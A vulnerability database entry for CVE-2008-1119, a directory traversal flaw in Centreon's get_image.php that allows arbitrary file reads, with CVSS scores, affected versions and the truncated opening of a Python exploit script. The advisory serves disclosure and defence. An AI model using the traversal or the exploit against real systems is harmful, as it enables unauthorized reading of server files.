5
CVSSv2

CVE-2008-1119

Published: 03/03/2008 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in include/doc/get_image.php in Centreon 1.4.2.3 and previous versions allows remote malicious users to read arbitrary files via a .. (dot dot) in the img parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

centreon centreon

centreon centreon 1.4.2.2

centreon centreon 1.4.1

centreon centreon 1.4

centreon centreon 1.4.2.1

centreon centreon 1.4.2

Exploits

#!/usr/bin/python # Date : 20/01/2008 # Author : Julien CAYSSOL <julien@aqwzcom> import sys, urllib2,re user_agent = 'Mozilla/60 (compatible; MSIE 60; Windows NT)' headers = { 'User-Agent' : user_agent , 'Accept-Charset' : 'ISO-8859-15' } if __name__ == "__main__": if len(sysargv)==2: ...